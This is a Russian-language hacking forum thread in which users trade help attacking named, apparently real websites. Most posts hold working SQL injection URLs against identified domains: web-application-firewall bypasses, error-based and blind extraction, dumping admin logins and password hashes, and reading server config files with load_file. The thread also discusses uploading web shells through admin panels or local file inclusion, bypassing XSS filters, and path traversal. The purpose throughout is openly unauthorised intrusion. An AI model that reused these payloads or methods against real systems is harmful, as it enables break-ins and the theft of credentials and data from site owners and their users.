Если получишь Y, значит права есть. Следовательно, ты можешь читать файлы через load_file() и писать в них, дальше попробуй прочитать конфиги сервера.


HTML:
SELECT load_file('/etc/apache2/httpd.conf')

и тд, там ты найдешь путь.

Стандартные пути для файлов конфигурации, ты можешь найти по ссылке /thread49775-Default.html

Либо ищи раскрытие путей.

Некоторые варианты, как это можно сделать описаны мной вот тут /showpost.php?p=2324984&postcount=4

Какая вообще твоя цель? Шелл залить? Ты можешь достать из базы акк админа и попробывать залить через админку. Как это сделать обсуждалось выше.

сенкс за урок, после техникума домучаюсь

Стоит какой-то ваф с фильтрами на union,select и слово information_schema. Union и select обошел скобочками, а вот инф_схема никак не могу, выбрасывает на forbidden и всё тут. /**/ не помогает.

union(SELECT+1,table_name,3,4,5)from(iNformation_s chema.tabl%00es) Вот так не работает.

union(SELECT+1,version(),3,4,5) так работает.

Посоветуйте что-либо плиз.

Спасибо.

Попробуй:

1 - /*!запрос*/

2 - использовать метод POST

nullik said:
Стоит какой-то ваф с фильтрами на union,select и слово information_schema. Union и select обошел скобочками, а вот инф_схема никак не могу, выбрасывает на forbidden и всё тут. /**/ не помогает.
union(SELECT+1,table_name,3,4,5)from(iNformation_s chema.tabl%00es) Вот так не работает.
union(SELECT+1,version(),3,4,5) так работает.
Посоветуйте что-либо плиз.
Спасибо.


Может быть ты имел ввиду


HTML:
union+(select+1,2,table_name,4,5+from+(information _schema.tables))


Пробуй так:


Code:
from+information_schema.`tables`



Code:
from+/*!information_schema.tables*/

И с чего ты взял, что там фильтруется именно union select information_schema.tables, а не например union select from?

Вот варианты на случай, если фильтруется union select from /showpost.php?p=2289579&postcount=14623, ну и если фильтруется и то и другое.

Ну и from+information_schema./*!tables*/

Да и вообще, не факт что там именно на .tables реагирует.

Поэтому или ссылку кидай или потестируй на каком этапе отрубает.

буду использовать гугл прежде чем задавать вопросы

буду использовать гугл прежде чем задавать вопросы

буду использовать гугл прежде чем задавать вопросы

буду использовать гугл прежде чем задавать вопросы

буду использовать гугл прежде чем задавать вопросы

буду использовать гугл прежде чем задавать вопросы

буду использовать гугл прежде чем задавать вопросы

nullik said:
Стоит какой-то ваф с фильтрами на union,select и слово information_schema. Union и select обошел скобочками, а вот инф_схема никак не могу, выбрасывает на forbidden и всё тут. /**/ не помогает.
union(SELECT+1,table_name,3,4,5)from(iNformation_s chema.tabl%00es) Вот так не работает.
union(SELECT+1,version(),3,4,5) так работает.
Посоветуйте что-либо плиз.
Спасибо.


На локальной серваке следующие запросы вызывали ошибку:

(SELECT+1,table_name,3,4,5)from(iNformation_schema .tabl%00es)

(SELECT+1,table_name,3,4,5)from(iNformation_schema .tables)

а вот запрос

(SELECT+1,table_name,3,4,5 from iNformation_schema.tables)

прошел.

Кстати не понял почему такой запрос тоже вызвал ошибку

(SELECT+1,table_name,3,4,5+from iNformation_schema.tables)

Redwood, мне нужно слить определенные таблицы (например users)

Приветсвую господа!

Столкнулся с такой траблой, прочитал все таблицы:

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28table_name %29,5,6,7,8,9+from+information_schema.tables+where +table_schema=database%28%29+--+

затем прочитал колонки:

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28column_nam e%29,5,6,7,8,9+from+information_schema.columns+whe re+table_name=0x7573657273+--+

но вывести данные которые нужно не могу, выводит лишь первую колонку:

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,id_user,5,6,7,8,9+from+us ers+--+

а вывести user_name,user_hash не получается никак, я так понимаю это фильтруется, пробовал юзать CHAR, HEX, не пашет ((

Посоветуйте, пожалуйста!

П.С. Друзья а как вы боретесь с хостингом SWEB.RU который мешает проверять сайты на прочность ?

таблиц users несколько, в той базе с которой ты работаешь в этой таблице нет колонок user_name.

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28column_nam e%29,5,6,7,8,9+from+information_schema.columns+whe re+table_name=0x7573657273%20and%20table_schema=0x 70726f70726f6a5f70726f70726f6a6563746f72+--+

user_name

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28user_name% 29,5,6,7,8,9+from+proproj_sugarcrm.users+--+

Логин админа

http://www.pro-projector.ru/news_N.php?id_page=13+and+1=0+%20Union%20Select%20 %201,2,3,user_name,5,6,7,8,9%20from%20proproj_suga rcrm.users

Хеш пароля админа

http://www.pro-projector.ru/news_N.php?id_page=13+and+1=0+%20Union%20Select%20 %201,2,3,user_hash,5,6,7,8,9%20from%20proproj_suga rcrm.users

p.s. отображаются в теге title

grably said:
П.С. Друзья а как вы боретесь с хостингом SWEB.RU который мешает проверять сайты на прочность ?


Сам не сталкивался, а каким образом это проявляется?

mr.celt said:
Сам не сталкивался, а каким образом это проявляется?



Фаервол стоит, который проверяет запросы на наличие запрещенных слов (from, information_schema и еще каких-то) и редиректит на служебную страницу с сообщением, что запрос отвергнут

попугай said:
Фаервол стоит, который проверяет запросы на наличие запрещенных слов (from, information_schema и еще каких-то) и редиректит на служебную страницу с сообщением, что запрос отвергнут


Ну понятно, то есть какой-нибудь WAF стоит. Наверно и универсального решения тут не будет. Если это mod_security какой-нибудь, то есть пути обхода, начиная от простых вариантов типа /*!union*/ и т.д. Но если что-то более серьезное типа "Баракуды", которая специально нацелена на такого вида запросы, включая и работу с https, то тут все намного сложнее.

KREGI said:
Логин админа
http://www.pro-projector.ru/news_N.php?id_page=13+and+1=0+%20Union%20Select%20 %201,2,3,user_name,5,6,7,8,9%20from%20proproj_suga rcrm.users
Хеш пароля админа
http://www.pro-projector.ru/news_N.php?id_page=13+and+1=0+%20Union%20Select%20 %201,2,3,user_hash,5,6,7,8,9%20from%20proproj_suga rcrm.users
p.s. отображаются в теге title



Неподходит ((

http://www.pro-projector.ru/admin/index.php

admin

1805

пробовал также +limit+1,1

snow

8500

тоже не подходит

mr.celt said:
Сам не сталкивался, а каким образом это проявляется?



ну вот живой пример:

http://www.scrz.ru/show_part.php?id=2061-999.9+union+select+1,version%28%29,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20--

Всем спасибо, фильр в итоге обошел вот так

.php?id=10+union(SELECT+1,group_CONCAt(table_name) ,3,4,5+from+information_schema./*!tables*/+where+table_name+like(0x257573657225))

Плюсики накидал, ибо помогло.

grably said:
ну вот живой пример:
http://www.scrz.ru/show_part.php?id=2061-999.9+union+select+1,version%28%29,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20--




HTML:
http://www.scrz.ru/show_part.php?id=2061+and+1=0+=null=null%20union%2 0select+1,database%28%29,3,4,5,6,7,8,9,10,11,%2012 ,13,14,user%28%29,version%28%29,17,18,19,20

ну а дальше блокирует как бы сказано выше...


grably said:
Неподходит ((
http://www.pro-projector.ru/admin/index.php
admin
1805
пробовал также +limit+1,1
snow
8500
тоже не подходит


хм... не пойму почему... больше не где не нахожу хеши...

пля = \ помогите лимит подобрать = \

http://pogoda.v.ua/index.php?id=-264

Дошол до 120 и ничего = \

GroM88 said:
пля = \ помогите лимит подобрать = \
http://pogoda.v.ua/index.php?id=-264
Дошол до 120 и ничего = \


_http://pogoda.v.ua/index.php?id=-264%20Union%20Select%20%201%20,%20version%28%29%20 ,3,4,5

Tag title

Интересно кому?


HTML:
http://www.yadonor.ru/ru/become/calendar_day/index.php?id_4[]=20101009000000

Strilo4ka said:
Example, we have mysql5.

Code:
select username from users order by username *(IF(ASCII(SUBSTRING(VERSION(),1,1))=53,1,-1))



No good.

site.php?orderby=-1 is true (ASC)

site.php?orderby=-2312 is true (ASC)

site.php?orderby=1 is false (no columns at all)

site.php?orderby=,1 is true (ASC)

site.php?orderby=*(IF(1=2,1,0)) is true (WTF???)

site.php?orderby=*(IF(1=1,0,0)) true again (asc)

Have no idea what to do. Any help?

2 grably:

http://www.scrz.ru/show_part.php?id=2061%20and%20ascii(lower(substrin g((select%20table_name%20from%20information_schema .tables%20limit%2017,1),1,1)))%3E1--

Подскажите как дальше разкручивается скуль с name_const

вот так показывает 5-ю версию

site.com/2.php?id=6+and+(1,2)in(select+*+from(select+name_c onst(version(),1),name_const(version(),1))as+a)&t=Community

как нужно изменить запрос чтобы вытянуть название таблиц из information_Schema.tables. Так ничего не выходит:

site.com/2.php?id=6+and+(1,2)in(select+*+from(select+name_c onst(table_name,1),name_const(table_name,1)+from+i nformation_Schema.tables)as+a)&t=Community

site.com/2.php?id=6+or(1,2)=(select*from(select name_const((select table_name from information_schema.tables limit 17,1),1),name_const((select table_name from information_schema.tables limit 17,1),1))a)

or

site.com/2.php?id=6 union select * from(select * from(select name_const((select table_name from information_schema.tables limit 17,1), 11)d) as t join (select name_const((select table_name from information_schema.tables limit 17,1), 11)e) b)a

Имеется локальный инклуд. С нул байтом. Цель - залить шелл.

На портале нет ни форума, ни блога - там где можна залить какую либо картинку и потом ее приинклудить. Нужна помощь... подкиньте идейку, как заинклудить шелл)

http://www.xakep.ru/post/49508/default.asp

уже два дня мучаюсь ((, тут как поступит?

Привожу варианты:

http://site.net/script.php?seeking_sex=1'

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13


SELECT distinct user_master.user_master_id, user_master.user_nickname, user_master.user_image, user_master.protected_image, user_master.explicit_image, user_master.r_rated_image, user_master.mark_as_logout, user_master.user_postcode, user_master.user_state, user_master.user_city, user_master.user_profile_title, user_master.user_description, user_master.seeking_description, user_master.user_maritial_status, user_master.profile_avg_rate, user_master.profile_rate_voter, user_master.seeking_sexuality, user_master.user_registered_as, user_master.email_verified, user_master_detail.user_profession, user_master.last_login, DATE_FORMAT(FROM_DAYS(TO_DAYS(NOW()) - TO_DAYS(user_master_detail.user_dob)), '%y') AS age FROM user_master INNER JOIN user_master_detail on(user_master_detail.user_master_id = user_master.user_master_id) WHERE user_master.user_show_profile_in_search='Y' and is_deleted_user_profile = 'N' AND user_master.user_master_id<>'0' AND user_master.is_new='N' AND (which_site_user = '2' OR which_site_user = '11') AND ( user_master.user_registered_as = '1'' ) AND (user_master.seeking_sexuality like '2' OR user_master.seeking_sexuality like '%,2' OR user_master.seeking_sexuality like '2,%' OR user_master.seeking_sexuality like '%,2,%' ) AND user_master.user_state='12' AND ( (DATE_FORMAT(FROM_DAYS(TO_DAYS(NOW()) - TO_DAYS(user_master_detail.user_dob)), '%y') BETWEEN 18 AND 100)) GROUP BY user_master.user_master_id order by user_master.last_login desc, user_master.created_date desc LIMIT 0, 6


http://site.net/script.php?seeking_sex=1')

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13

http://site.net/script.php?seeking_sex=1' order by 1--

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order b' ) AND (user_master.seeking_sexuality like '2' OR user_master' at line 13

тут одинаков ответ:

http://site.net/script.php?seeking_sex=1') order by 1--

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13

http://site.net/script.php?seeking_sex=1') order by 1000--

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13

тока на:

http://site.net/script.php?seeking_sex=1'' order by 1--

норм стр

но на:

http://site.net/script.php?seeking_sex=1'' order by 1000--

ответ тоже норм стр ((

Как можно решит тут? floor не помог

Заранее благодарен

PS. линк не палил

Многострочный запроc, а вы режете --, используйте /*.

Если не прокатит /*, то в уязвимый параметр 1') and ('1'='1.

Ну и тудо же впихнуть разные вариции всего известного чтоб вытащить в ошибку | пытатцо сделать принтабельной.

Strilo4ka said:
Многострочный запроc, а вы режете
--
, используйте
/*
.
Если не прокатит
/*
, то в уязвимый параметр
1') and ('1'='1
.
Ну и тудо же впихнуть разные вариции всего известного чтоб вытащить в ошибку | пытатцо сделать принтабельной.


спс

пробовал так:

http://site.net/script.php?seeking_sex=1') and ('1'='1+order by 1/*

без ошибок но и без профилей

а так:

http://site.net/script.php?seeking_sex=-1') and ('1'='1+order by 1/*

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13

http://site.net/script.php?seeking_sex=-1') OR ('1'='1+order by 1/*

без ошибок но и без профилей

что то не получится чтол

YuNi|[c гадать трудно, думаю линк помог бы быстрее решить проблему

Konqi said:
YuNi|[c гадать трудно, думаю линк помог бы быстрее решить проблему


ну линк в студию просто убет его ))

Отправил в пм

В одном сайте при бронирование номера вылез такое дело:


Символьные или двоичные данные могут быть усечены.~|~exec renesans.dbo.BronJPrepareSitePublic @UIDTD=62503, @UIDTDError=58600, @UIDSiteGenerate=2808866;


Это уязвимость ? (и вообше что это такое? )

А такое как раскрутить

http://steroidman.ru/dle_haki/page/999999999999999999

B1t.exe said:
В одном сайте при бронирование номера вылез такое дело:
Это уязвимость ? (и вообше что это такое? )


видимо ваф ругался или скрипт неправильно обрабатывал запросы

YuNi|[c запрос ограничен по количеству символов, а сам пытался крутить этот сайт


AND ( user_master.user_registered_as = '1'' )


вот тут скуль, но больше 5 символов не вставить.

попробуй post передать 1' order by 10/* и увидишь результат


AND ( user_master.user_registered_as = '1' orde' )


сам голову долго ломал над этим

durito said:
YuNi|[c
запрос ограничен по количеству символов, а сам пытался крутить этот сайт
вот тут скуль, но больше 5 символов не вставить.
попробуй post передать 1' order by 10/* и увидишь результат
сам голову долго ломал над этим


ну вообше то я и постом отправлял все и 1' order by 10/* тоже пробовал ничего ((

Да там отрезает энное кол символов но тут скул очевиден и вот пробую разные варианты. Пока не пофиксили но и решение тоже нету ((

есть сайт, на нем 100% SQL уязвимость,знаю точно ,что число колонок 10, union select Не выводит не чего, ошибки не выдает на

http://www.site.ru/index.php?id=36+union+select+1,2,3,4,5,6,7,8,9,10

но и не выводит не чего...

Подскажите, где скачать скрипты для sql blind injection... когда-то качал с форума, сча не найду никак))

2KREGI,


есть сайт, на нем 100% SQL уязвимость,знаю точно ,что число колонок 10, union select Не выводит не чего, ошибки не выдает на
http://www.site.ru/index.php?id=36+union+select+1,2,3,4,5,6,7,8,9,10
но и не выводит не чего...


пробуй как blind sql inj, но вообще лучше бы линк кинул сюда

KREGI said:
есть сайт, на нем 100% SQL уязвимость,знаю точно ,что число колонок 10, union select Не выводит не чего, ошибки не выдает на
http://www.site.ru/index.php?id=36+union+select+1,2,3,4,5,6,7,8,9,10
но и не выводит не чего...


Попробуй так

http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null

http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null

Возможные варианты:

- не соответствует кодировка или тип данных.

Тогда, пользуйся функциями приведения типов

convert(version(),binary)

convert(version()+using+latin1)

convert(version()+using+binary)

cast(version()+as+binary)

cast(version()+as+int)

cast(version()+as+char)

и тд.

Ну или шифруй и расшифровывай данные на ходу, тогда они вернутся уже в нужной кодировке

aes_decrypt(aes_encrypt(version(),1),1)

unhex(hex(version()))

Многие базы, в отличии от MySQL, чувствительны к типу данных, например PostgreSQL.

- у скули нету вывода.

Redwood ты тоже посмотри на мои варианты может у тя что получится

/threadnav46016-1536-10.html

http://veer[antigoogle]mirov.ru/forum/?f=1&p='

Помогите. явная скуля.

Redwood said:
Попробуй так
http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null
http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null
Возможные варианты:
- не соответствует кодировка или тип данных.
Тогда, пользуйся функциями приведения типов
convert(version(),binary)
convert(version()+using+latin1)
convert(version()+using+binary)
cast(version()+as+binary)
cast(version()+as+int)
cast(version()+as+char)
и тд.
Ну или шифруй и расшифровывай данные на ходу, тогда они вернутся уже в нужной кодировке
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(version()))
Многие базы, в отличии от MySQL, чувствительны к типу данных, например PostgreSQL.
- у скули нету вывода.


я пробовал по разному, если http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null

http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null

то показывает абракадабру.

функции приведения типов не дали не чего...

что делать если у скули нет вывода?

blind sql inj вроде работает, определил версию...но вывести через нее ,как я не понял

Какая версия, каким запросом у тебя получилось ее определить и что ты увидел на странице ?

IMMORTAL_S said:
Подскажите, где скачать скрипты для sql blind injection... когда-то качал с форума, сча не найду никак))


Вероятно, вот тут /thread119047-%C1%FB%F1%F2%F0%FB%E9.html

Redwood said:
Какая версия, каким запросом у тебя получилось ее определить и что ты увидел на странице ?


http://www.site.ru/index.php?id=106 and substring(@@version,1,1)=5

без ошибок - следовательно 5 версия.

R1dex мне подсобил уже с этой скулей,

вот такой запрос работает

24 and 1=0 union select 1,2,3,4,5,6,7,9,null,10

Собственно вот:

http://www.mibf.ru/index.php?id=24 and 1 =0 union select 1,2,3,4,5,6,7,9,0x3a,10-- 1

сейчас проверил, оказалось его уже вскрыли раньше меня

вот такая трабла:

http://www.koisite.info/view_profile1.php?user=-2653%27+union+select+version%28%29+from+admin+limi t+0,1+--+

выводит версию в строку - 2004-00-27 даты

то есть вывод числовых значений без проблем

теперь пробуем вывести имя:

http://www.koisite.info/view_profile1.php?user=-2653'+union+select+loginname+from+admin+limit+0,1+--+

выводит 0000-00-00

думал попробовать покрутить через подзапросы, не не тут то было

http://www.koisite.info/view_profile1.php?user=2653%27+and%20substring%28v ersion%28%29,1,1%29=4+--+

выводит профиль

http://www.koisite.info/view_profile1.php?user=2653%27+and+ascii%28substri ng%28%28select%20pwd%20from%20admin+limit+0,1%29,1 ,1%29%29%3E0+--+

ругается и обрезает все что идет до select

http://www.koisite.info/view_profile1.php?user=2653%27+and+ascii%28substri ng%28%28/*!select*/%20pwd%20from%20admin+limit+0,1%29,1,1%29%29%3E0+--+


You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'select*/ pwd from admin limit 0,1),1,1))>0 -- '' at line 1

Помогите раскрутить слепую sql:

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select pass FROM users LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select pass FROM users LIMIT 1), 14)e) b)a--+

Не выводит не одно из полей, не login, не password, ничего короче, помогите пожалуйста.

http://www.ollis.ru/index.php?rest=1')+or+1+group+by+concat(version(), floor(rand(0)*2))having+min(0)+or+1--+

Duplicate entry '5.0.221' for key 1

Konqi said:
http://www.ollis.ru/index.php?rest=1')+or+1+group+by+concat(version(), floor(rand(0)*2))having+min(0)+or+1--+
Duplicate entry '5.0.221' for key 1


Я это знаю, как до значений таблицы дойти, пароли нужны)

2MastaBass1:

Ну так.. Table 'ollis.users' doesn't exist

Ищи свою табличку в другой бд..

R1dex said:
2MastaBass1:
Ну так.. Table 'ollis.users' doesn't exist
Ищи свою табличку в другой бд..


Это тоже знаю, так как ее найти, перебором?

http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup

перебирай лимит ом

Konqi said:
http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup
перебирай лимит ом


Просто лимит 1 потом 2 и т.д.? Не догнал...

Делаю так

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user FROM _access LIMIT 1), 14)e) b)a--+

гонит Unknown column 'user' in 'field list'

побывал и логин и много чего

http://comunidad.encuentra24.com/browse_businesses_locations.php?businesscat_id=10

и что ?

MastaBass1 said:
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user FROM _access LIMIT 1), 14)e) b)a--+
гонит Unknown column 'user' in 'field list'
побывал и логин и много чего



Хватит уже тыкать таблицы и колонки наугад. У тебя 5-ая ветка, ничего подбирать не надо, просто почитай хоть одну статью...

Колонки в таблице _access

http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns+where+table_name=0x5f61 6363657373 LIMIT 0,1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns+where+table_name=0x5f61 6363657373 LIMIT 0,1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup

Ну и:

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user_id FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user_id FROM _access LIMIT 1), 14)e) b)a--+

http://veer[antigoogle]mirov.ru/forum/?f=1&p='


Странная скуля, даже кол-во полей подобрать немогу.

EoGeneo said:
Странная скуля, даже кол-во полей подобрать немогу.


может всё таки её там нет...

http://veermirov.ru/forum/?f=1&p=999999999999999999

помгите найти админку nll.com =)

nll.com/horde/imp/login.php

Нужна помощь,здесь есть иньекция

http://steroidanabolic.com/phpBB/privmsg.php?mode='%22%5C'%5C%22);|]*{%0d%0a%3C%00%3E&u=186

http://steroidanabolic.com/phpBB/viewforum.php?f=1&start=-268435455

YuNi|[c said:
спс
пробовал так:
http://site.net/script.php?seeking_sex=1') and ('1'='1+order by 1/*
без ошибок но и без профилей
а так:
http://site.net/script.php?seeking_sex=-1') and ('1'='1+order by 1/*
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13
http://site.net/script.php?seeking_sex=-1') OR ('1'='1+order by 1/*
без ошибок но и без профилей
что то не получится чтол


ну лан палит то палим линк главное найти хот какую решение:

http://www.nz.adultxdating.com/search_get.html

POST

txt_user_sex=2&txt_agefrom=20&txt_ageto=25&search_submit.x=52&search_submit.y=14&sel_state_id=12&txt_seeking_sex%5B%5D=1'

Это уже посмотрел профи и пока ниче может народ что скажет (много мозгов)? В первые встречаю такой гемор.

Подскажите пожалуйста, какие есть способы обхода встроенного xss фильтра для IE8. Перепробовал все способы с этой статьи:

http://www.xakep.ru/magazine/xa/130/062/1.asp

на версии 8.0.6001.18702 - ни один не работает.

В результате xss желательно подгрузить свой .js файл через src или каким-то иным способом, чтобы код в нем исполнился. Заранее спасибо

Если в postgresql нет прав usesuper, можно что либо сделать при иньекции?

http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4

gabarea said:
http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4


а вопрос

SQL inj


Code:
http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4%20or(1,2 )=(select*from(select%20name_const(version(),1),na me_const(version(),1))a)

FPD


Code:
http://www.mahiram.com/wp-includes/vars.php?PHP_SELF=be

http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4

Error: The used SELECT statements have a different number of columns

blind sql

она показывала мне что есть Xss
ну дело в том что она показывает:
Фильтрация по тегу «1206302<>»
а как это понять Я не знаю ??


Для начала - где эта хсс.

Насчет "фильтрация и..." сказать ничего не могу, т.к. данным софтом не пользовался.

DesCent said:
Для начала - где эта хсс.
Насчет "фильтрация и..." сказать ничего не могу, т.к. данным софтом не пользовался.


вот тут: http://onona.ua/diary/search.phtml?type=popular&tag=1206302%3C%3E

я вот не могу понять как мне найти что бы появилось окошко

-----------------------------------------------------------------

а каким лучше скриптом проверять на уязвимость ??

">alert('xss')

Alert("XSS")

или на пиши свой

ТУТ МНЕ ПОМОГУТ ?

разобраться

Уж простите нуба, но самому интересно что это:

При выполнении такого (http://pastebin.com/gURJ5uUN) запроса, вверху сайта появляется строчка


Code:
function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i'));dF('&4Dtdsjqu&4Fbmfsu&39&38YTT&38&3:&4D0tdsjqu&4F1')">

Что это? Понимаю, что здесь подобных вопросов(и нубов) сотни, но интересно - что это?

Help!помогите!

нашел уязвимость!но не могу правельно составить запрос!

http://www.activ.kz/ru/?l=news&o=display&page=&idx=345

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'NEWS_ID=345';'.

/ru/_news.asp, line 260

http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3,4,5,6,7,8+from+news

http://www.activ.kz/ru/?l=news&o=display&page=&idx=-345+union+select+*+from+msysobjects+in+'.'

Microsoft JET Database Engine error '80004005'

The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.

/ru/_news.asp, line

Но вывести нечего не удаеться.

Поскажите, как правилбно составить запрос.

DesCent said:
Уж простите нуба, но самому интересно что это:
При выполнении
такого (http://pastebin.com/gURJ5uUN)
запроса, вверху сайта появляется строчка

Code:
function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i'));dF('&4Dtdsjqu&4Fbmfsu&39&38YTT&38&3:&4D0tdsjqu&4F1')">

Что это? Понимаю, что здесь подобных вопросов(и нубов) сотни, но интересно - что это?


Ты решил мне помочь ?? я рад

не ходите на эти ссылки он туда вирус всунул У меня авира ругается

Generalisimu said:
нашел уязвимость!но не могу правельно составить запрос!
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'NEWS_ID=345';'.
/ru/_news.asp, line 260
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3,4,5,6,7,8+from+news
http://www.activ.kz/ru/?l=news&o=display&page=&idx=-345+union+select+*+from+msysobjects+in+'.'
Microsoft JET Database Engine error '80004005'
The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.
/ru/_news.asp, line
Но вывести нечего не удаеться.
Поскажите, как правилбно составить запрос.


Запрос правильный.

Вот например выводится id новости.


Code:
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3,4,NEWS_ID,6,7,8+from+ne ws

Так как доступа нет к системным таблицам MS Access, подбирать таблицу и колонки придется в ручную.

Советую почитать Проведение SQL инъекций в Microsoft Access (http://sh00k.org/2007/10/30/provedenie_sql_inekcijj_v_microsoft_access.html)

как залить шелл через админку Coppermine Photo Gallery 1.4.12?

.:[melkiy]:., линк в ПМ.

http://www.7not.net/?m=news&n='

http://www.7not.net/?n=-1'

Как здесь запрос составить подскажите.Пробовал и union+select и order+by и что-то ничего не выходит

JohnnyBGoode said:
http://www.7not.net/?m=news&n='
http://www.7not.net/?n=-1'
Как здесь запрос составить подскажите.Пробовал и union+select и order+by и что-то ничего не выходит


Нет тут скули

PHP:
$a=preg_replace('/\//','',$_GET["b"]);

подскажите, тут можно как-нибудь выполнить произвольный код?

povar said:

PHP:
$a=preg_replace('/\//','',$_GET["b"]);

подскажите, тут можно как-нибудь выполнить произвольный код?


Это равносильно тому, что написать:

$a = $_GET['a'];

тут есть выполнение произвольного кода?

Может переменная попадает в SQL запрос, или eval, или include, или просто выводится на страницу. Исходя из этого уже можно делать какие то выводы. А пока что, экстрасенсов тут нет.

Все, что можно сказать по этой строке, это то, что переменная 'a' равна переменной 'b', переданной методом GET с отфильтрованными слешами.

Либо выкладывай больше кода, либо выполнения произвольного кода здесь нет.

povar said:

PHP:
$a=preg_replace('/\//','',$_GET["b"]);

подскажите, тут можно как-нибудь выполнить произвольный код?


А при чем тут выполнение кода? Тут, я так понимаю, режуться символы от LFI\RFI. Есть способы обхода данного фильтра, фильтр слишком глупый =\

UPD:Я что-то не понял фильтра, там вроде массив должен быть, но не как все сразу перечислены, такой фильтр не от чего не защищает

Выдержка из этой статьи:

/thread56756.html


Достаточно известный способ выполнить команды там, где нельзя, но очень хочется =)
При использовании /e(~e) модификатора в регулярке - пхп код, содержащийся во втором аргументе, выполнится...
....
Однако, даже если модификатор /e отсутствует - мы при возможности можем внедрить его, обрубив регулярку NULL-байтом.


В моем случае так нельзя проделать?

дальше идет:


PHP:
$f=fopen("./$a","r");

while($r=fread($f,1024)) print$r;

все это крутится на винде, скорее всего хр.

т.к. / фильтруются, пробовал ..\..\..\..\..\..\..\boot.ini

но не выводит ничего. ошибки не выводятся, путей нет.

какие варианты дальнейших действий?

povar said:
В моем случае так нельзя проделать?




povar said:
дальше идет:

PHP:
$f=fopen("./$a","r");

while($r=fread($f,1024)) print$r;

все это крутится на винде, скорее всего хр.
т.к. / фильтруются, пробовал ..\..\..\..\..\..\..\boot.ini
но не выводит ничего. ошибки не выводятся, путей нет.
какие варианты дальнейших действий?


В твоем случае проделать так нельзя, так как preg_replace рассматривает параметр replacement как php код, только в случае наличия модификатора '/e', плюс в твоем случае параметр replacement явно определен, это пустое значение и каким либо php кодом заменить его нельзя.

У тебя читалка. Что касается фильтрации, то таким образом ..\..\..\..\..\..\..\ фильтр успешно обойдется, так что дело тут не в ней.

Что касается остального, то по всей видимости, вывод об ошибках отключен и такого файла по заданному пути нет. Пробуй прочитать, что нибудь еще.

XP? WTF?

lpb-company.ru помогите админку найти.. или ткните где можно почитать об распространенных названиях..

Почитать можно тут:

